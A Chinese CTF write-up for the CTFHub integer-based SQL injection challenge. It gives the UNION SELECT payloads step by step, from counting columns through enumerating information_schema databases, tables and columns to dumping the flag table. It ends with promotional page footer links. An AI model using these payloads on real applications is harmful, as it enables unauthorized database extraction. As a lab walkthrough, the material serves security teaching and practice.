CTFHUB-整数型SQL注入

在这里插入图片描述根据提示输入1后发现页面回显并且url改变。由题可知此题为整数型注入
在这里插入图片描述

在这里插入图片描述使用order by语句查询字段数
在这里插入图片描述在这里插入图片描述参数为3时不回显,说明字段数为2

使用union联合查询检测信息回显位置

id=1 union select 1,2

在这里插入图片描述由于页面只允许返回一行内容,所以我们修改参数1为-1,使需要查询的信息回返

id=-1 union select 1,2

在这里插入图片描述

id=-1 union select 1,database()

获取当前数据库名
在这里插入图片描述id=-1 union select 1,group_concat(schema_name)from information_schema.schemata
获取所有数据库名
在这里插入图片描述

d=-1 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli'

查询数据库sqli表名
在这里插入图片描述

union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'

获取flag列所有字段名
在这里插入图片描述获取指定数据库的表的列的内容

union select 1,group_concat(flag) from sqli.flag

在这里插入图片描述

Logo
开放原子开发者工作坊

开放原子开发者工作坊旨在鼓励更多人参与开源活动,与志同道合的开发者们相互交流开发经验、分享开发心得、获取前沿技术趋势。工作坊有多种形式的开发者活动,如meetup、训练营等,主打技术交流,干货满满,真诚地邀请各位开发者共同参与!

更多推荐

OpenLoong项目通过技术监督委员会(TOC)评审

OpenLoong项目通过技术监督委员会(TOC)评审

avatar 开放原子开发者工作坊

开发者谈开源:KWDB开源数据库的未来路径与生态构建实践

开发者谈开源:KWDB开源数据库的未来路径与生态构建实践

avatar 开放原子开发者工作坊

开发者谈开源:洞悉协作创新背后的机遇与挑战

近日,在2024开放原子开发者大会暨首届开源技术学术大会开幕式上,开放原子开源基金会与openKylin、EasyAda、KWDB开源项目举行捐赠签约仪式。 一场捐赠签约仪式,让三个开源项目及其背后的开发者们受到瞩目。本次,我们与“龘”(EasyAda)核心维护者王伶卓开启了对话。

avatar 开放原子开发者工作坊